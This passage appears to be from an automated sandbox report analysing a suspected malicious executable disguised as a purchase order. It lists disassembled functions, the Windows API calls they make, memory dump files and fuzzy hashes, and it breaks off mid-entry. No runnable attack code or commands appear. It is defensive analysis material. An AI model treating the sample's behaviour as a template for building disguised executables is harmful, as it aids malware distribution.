                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorLastacceptselect
                                  • String ID:
                                  • API String ID: 385091864-0
                                  • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                  • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                  • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                  • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                  Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                  • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                  Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                  • GetStockObject.GDI32(00000011), ref: 00430258
                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                  • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$CreateMessageObjectSendShowStock
                                  • String ID:
                                  • API String ID: 1358664141-0
                                  • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                  • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                  Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                  • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                  • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 2880819207-0
                                  • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                  • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                  Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 00430BA2
                                  • ScreenToClient.USER32(?,?), ref: 00430BC1
                                  • ScreenToClient.USER32(?,?), ref: 00430BE2
                                  • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ClientRectScreen$InvalidateWindow
                                  • String ID:
                                  • API String ID: 357397906-0
                                  • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                  • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                  Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  • __wsplitpath.LIBCMT ref: 0043392E
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • __wsplitpath.LIBCMT ref: 00433950
                                  • __wcsicoll.LIBCMT ref: 00433974
                                  • __wcsicoll.LIBCMT ref: 0043398A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                  • String ID:
                                  • API String ID: 1187119602-0
                                  • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                  • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                  Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$_malloc_wcscat_wcscpy
                                  • String ID:
                                  • API String ID: 1597257046-0
                                  • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                  • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                  • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                  • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                  Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                  • __malloc_crt.LIBCMT ref: 0041F5B6
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free__malloc_crt
                                  • String ID:
                                  • API String ID: 237123855-0
                                  • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                  • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                  • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                  • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                  Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DeleteObject$74285CursorDestroy
                                  • String ID:
                                  • API String ID: 3764361659-0
                                  • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                  • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                  • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                  • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                  Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                  • RtlLeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                  • RtlLeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                  • String ID:
                                  • API String ID: 2223660684-0
                                  • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                  • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                  • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                  • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                  Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                  • EndPath.GDI32(?), ref: 00447336
                                  • StrokePath.GDI32(?), ref: 00447344
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                  • String ID:
                                  • API String ID: 2783949968-0
                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                  Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                  • String ID:
                                  • API String ID: 2710830443-0
                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                  Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                  • 74FD5030.USERENV(?,?,?,000000FF), ref: 00436C46
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseHandleHeap$D5030FreeObjectProcessSingleWait
                                  • String ID:
                                  • API String ID: 1757875481-0
                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                  Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00472B63
                                  • 7427A570.USER32(00000000), ref: 00472B6C
                                  • 74284620.GDI32(00000000,0000000C), ref: 00472B78
                                  • 7427A480.USER32(00000000,?), ref: 00472B99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 7427$74284620A480A570DesktopWindow
                                  • String ID:
                                  • API String ID: 2484511535-0
                                  • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                  • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                  • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                  • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                  Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00472BB2
                                  • 7427A570.USER32(00000000), ref: 00472BBB
                                  • 74284620.GDI32(00000000,00000074), ref: 00472BC7
                                  • 7427A480.USER32(00000000,?), ref: 00472BE8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 7427$74284620A480A570DesktopWindow
                                  • String ID:
                                  • API String ID: 2484511535-0
                                  • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                  • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
